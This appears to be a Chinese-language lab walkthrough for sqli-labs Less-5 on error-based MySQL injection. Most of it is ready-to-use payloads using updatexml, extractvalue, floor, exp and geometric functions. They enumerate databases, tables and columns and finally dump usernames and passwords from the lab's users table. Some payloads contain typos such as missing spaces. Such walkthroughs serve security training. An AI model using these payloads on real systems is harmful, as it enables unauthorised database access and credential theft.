Less-5:报错注入
id=1 页面有回显
第一步:判断注入类型是数字型还是字符型
id=1‘
出现报错为 ''1'' LIMIT 0,1'' 可判断为字符型且为单引号闭合(报错里面有数字)
第二:判断字段数,使用order by
order by 3时页面正常,order by 4时页面异常,说明有三个字段
updatexml(): select * from test where id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1);
查询当前数据库:
updatexml只能显示32位
爆库: updatexml(1,concat(0x2a,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) //爆出所有库名 0,32每次只能爆32为字符,从开始
于是使用substr剪切 暴库:
updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),0,32),0x7e),1) //updatexml函数只支持32位长度的报错 floor支持64,但是太长不好记
其他报错注入时的函数
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat((selectuser()),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()select * from test where id=1 and (extractvalue(1,concat(0x7e,(selectuser()),0x7e)));
3.updatexml()select * from test where id=1 and (updatexml(1,concat(0x7e,(selectuser()),0x7e),1));
4.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select *from(select user())a)b));
5.multipoint()select * from test where id=1 and multipoint((select * from(select * from(selectuser())a)b));
6.polygon()select * from test where id=1 and polygon((select * from(select * from(selectuser())a)b));
7.multipolygon()select * from test where id=1 and multipolygon((select * from(select *from(select user())a)b));
8.linestring()select * from test where id=1 and linestring((select * from(select * from(selectuser())a)b));
9.multilinestring()select * from test where id=1 and multilinestring((select * from(select *from(select user())a)b));
10.exp()select * from test where id=1 and exp(~(select * from(select user())a));
开始使用substr函数剪切字符串
updatexml(1,concat(0x2a,substr((select group_concat(schema_name) from information_schema.schemata),1,32),0x7e),1)--+
//拆解如下 concat(0x2a,substr((select group_concat(schema_name) from information_schema.schemata),1,32),0x7e)//前面为0x2a 必须为不可见字符开头 substr((select group_concat(schema_name) from information_schema.schemata),1,32)//从1开始 不是0 (select group_concat(schema_name) from information_schema.schemata)
不断剪切直至出现0x7e为止(为~线)
将所有的库列出
limit:
updatexml(1,concat(0x7e,substr((select schema_name from information_schema.schemata limit 0,1),1,32),0x7e),1)--+
//拆解如下 concat(0x7e,substr((select schema_name from information_schema.schemata limit 0,1),1,32),0x7e) substr((select schema_name from information_schema.schemata limit 0,1),1,32) (select schema_name from information_schema.schemata limit 0,1)
爆表
(updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,32),0x7e),1)); -- +
//拆解如下 concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,32),0x7e) substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,32) (select group_concat(table_name) from information_schema.tables where table_schema='security')
爆字段:
(updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,32),0x7e),1)); -- +
//拆解如下 concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,32),0x7e) substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,32) (select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')
爆字段:
updatexml(1,concat(0x2a,substr((select group_concat(username,0x3a,password) from security.users),1,32),0x7e),1);--+
//拆解如下 concat(0x2a,substr((select group_concat(username,0x3a,password) from security.users),1,32),0x7e) substr((select group_concat(username,0x3a,password) from security.users),1,32) (select group_concat(username,0x3a,password) from security.users)